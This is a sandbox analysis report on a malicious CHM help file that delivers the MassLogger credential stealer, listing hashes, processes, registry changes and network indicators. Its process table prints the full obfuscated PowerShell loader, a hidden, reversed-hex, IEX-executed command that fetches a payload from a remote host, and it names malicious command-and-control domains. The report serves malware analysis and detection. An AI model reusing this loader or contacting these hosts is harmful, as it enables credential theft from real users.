File name:

doc.chm

Full analysis: https://app.any.run/tasks/61a8f81c-2c67-4615-b690-2b17b064191c
Verdict: Malicious activity
Threats:

MassLogger is a credential stealer and keylogger first identified in April 2020. It has been actively used in cyber campaigns to exfiltrate sensitive information from compromised systems. It is designed for easy use by less tech-savvy actors and is prominent for the capability of spreading via USB drives. It targets both individuals and organizations in various industries, mostly in Europe and the USA.

Malware Trends Tracker     >>>
Analysis date: October 20, 2020, 06:09:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
evasion
trojan
masslogger
stealer
Indicators:
MIME: application/octet-stream
File info: MS Windows HtmlHelp Data
MD5:

301D4B2815D8EEB2A8BA5668A269D2BF

SHA1:

F0967158669AC3BB751F040064A5BBCD4BF5013F

SHA256:

A5E610B7CA55722AC964E6E589776A8304B2D3E532D2CE54FF50FEAEE89ADBC3

SSDEEP:

48:PZzgXA0BmQRlEFlErlEll5su816r1yHkLA45MwAWcYWcCav9YYDB8c7Z6WDJhx+K:PdwYp816r1DAZMcYFdV1DectbxuMlz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Actions looks like stealing of personal data

      • RegAsm.exe (PID: 2548)

    • MASSLOGGER was detected

      • RegAsm.exe (PID: 2548)

  • SUSPICIOUS

    • Executes PowerShell scripts

      • hh.exe (PID: 2180)
      • RegAsm.exe (PID: 2548)

    • Reads internet explorer settings

      • hh.exe (PID: 2180)

    • Creates files in the user directory

      • hh.exe (PID: 2180)
      • Powershell.exe (PID: 2932)
      • powershell.exe (PID: 996)

    • Reads the machine GUID from the registry

      • Powershell.exe (PID: 2932)

    • Checks supported languages

      • RegAsm.exe (PID: 2548)

    • Checks for external IP

      • RegAsm.exe (PID: 2548)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.chi | Windows HELP Index (81)
.chm | Windows HELP File (18.9)

EXIF

EXE

CHMVersion: 3
LanguageCode: English (U.S.)
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start hh.exe no specs powershell.exe #MASSLOGGER regasm.exe powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
996"powershell" Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegAsm.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2180"C:\Windows\hh.exe" C:\Users\admin\Desktop\doc.chmC:\Windows\hh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\hh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\hhctrl.ocx
c:\windows\system32\user32.dll
2548"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
0
Version:
4.7.3062.0 built by: NET472REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\mscoree.dll
2932"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -WindowStyle Hidden Set-PSReadlineOption -HistorySaveStyle SaveNothing;$diyyJ='D4%C7%72%72%02%E6%96%F6%A6%D2%02%37%27%16%86%34%96%96%36%37%16%42%02%D3%76%E6%96%27%47%35%96%96%36%37%16%42%B3%D7%22%F5%42%87%03%22%D5%56%47%97%26%B5%D5%27%16%86%36%B5%B7%02%47%36%56%A6%26%F4%D2%86%36%16%54%27%F6%64%C7%02%72%32%72%02%47%96%C6%07%37%D2%02%67%D6%42%02%D3%37%27%16%86%34%96%96%36%37%16%42%B3%92%72%76%07%A6%E2%24%43%F2%27%76%E2%E6%F6%96%37%96%67%F6%47%07%F6%F2%F2%A3%07%47%47%86%72%C2%46%F6%86%47%56%D4%A3%A3%D5%56%07%97%45%C6%C6%16%34%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%C2%72%76%E6%96%27%47%35%46%16%F6%C6%E6%77%F6%44%72%C2%97%47%47%42%82%56%D6%16%E6%97%24%C6%C6%16%34%A3%A3%D5%E6%F6%96%47%36%16%27%56%47%E6%94%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%02%D3%67%D6%42%B3%92%72%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%72%82%56%D6%16%E4%C6%16%96%47%27%16%05%86%47%96%75%46%16%F6%C4%A3%A3%D5%97%C6%26%D6%56%37%37%14%E2%E6%F6%96%47%36%56%C6%66%56%25%E2%D6%56%47%37%97%35%B5%02%D5%46%96%F6%67%B5%B3%D4%C7%72%92%47%E6%56%72%B2%72%96%C6%34%26%72%B2%72%56%75%E2%47%72%B2%72%56%E4%02%47%36%72%B2%72%56%A6%26%F4%72%B2%72%D2%77%56%E4%82%72%D3%97%47%47%42%B3%23%23%07%42%02%D3%02%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%A3%A3%D5%27%56%76%16%E6%16%D4%47%E6%96%F6%05%56%36%96%67%27%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%B3%92%23%73%03%33%02%C2%D5%56%07%97%45%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%82%47%36%56%A6%26%F4%F6%45%A3%A3%D5%D6%57%E6%54%B5%02%D3%02%23%23%07%42%B3%92%76%E6%96%07%42%82%02%C6%96%47%E6%57%02%D7%47%56%96%57%15%D2%02%13%02%47%E6%57%F6%36%D2%02%D6%F6%36%E2%56%C6%76%F6%F6%76%02%07%D6%F6%36%D2%02%E6%F6%96%47%36%56%E6%E6%F6%36%D2%47%37%56%47%02%D3%02%76%E6%96%07%42%B7%02%F6%46%B3%56%E6%F6%26%45%42%02%D4%02%C6%16%37%B3%92%72%94%72%C2%72%E3%72%82%56%36%16%C6%07%56%27%E2%72%85%54%E3%72%D3%56%E6%F6%26%45%42';$text =$diyyJ.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`XC:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
hh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
813
Read events
667
Write events
146
Delete events
0

Modification events

(PID) Process:(2180) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2180) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2180) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2180) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2180) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2180) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2180) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2932) Powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\13B\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2932) Powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2932) Powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
0
Suspicious files
3
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
2180hh.exeC:\Users\admin\AppData\Local\Temp\IMTF1D8.tmp
MD5:
SHA256:
2932Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TDU1X1495EG4O1VGQU4O.temp
MD5:
SHA256:
996powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\76QPLXIBPVYC4VFE4G6B.temp
MD5:
SHA256:
2180hh.exeC:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.datchm
MD5:
SHA256:
996powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
2932Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:
SHA256:
2932Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF19fc58.TMPbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
5
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2932
Powershell.exe
GET
200
78.47.203.8:80
http://optovision.gr/4B.jpg
DE
text
2.59 Mb
unknown
2548
RegAsm.exe
GET
200
50.17.193.91:80
http://api.ipify.org/
US
text
15 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2932
Powershell.exe
78.47.203.8:80
optovision.gr
Hetzner Online GmbH
DE
unknown
2548
RegAsm.exe
50.17.193.91:80
api.ipify.org
Amazon.com, Inc.
US
suspicious
5.189.152.112:59331
med-star.gr
Contabo GmbH
DE
malicious
2548
RegAsm.exe
5.189.152.112:21
med-star.gr
Contabo GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.212.142
malicious
optovision.gr
  • 78.47.203.8
unknown
dns.msftncsi.com
  • 131.107.255.255
shared
api.ipify.org
  • 50.17.193.91
  • 23.21.126.66
  • 23.21.109.69
  • 54.225.169.28
  • 54.235.98.120
  • 54.204.14.42
  • 54.225.66.103
  • 54.235.182.194
shared
med-star.gr
  • 5.189.152.112
malicious

Threats

PID
Process
Class
Message
2548
RegAsm.exe
Misc activity
SUSPICIOUS [PTsecurity] External IP Lookup (possible MassLogger)
2548
RegAsm.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup api.ipify.org
2548
RegAsm.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
doc.chm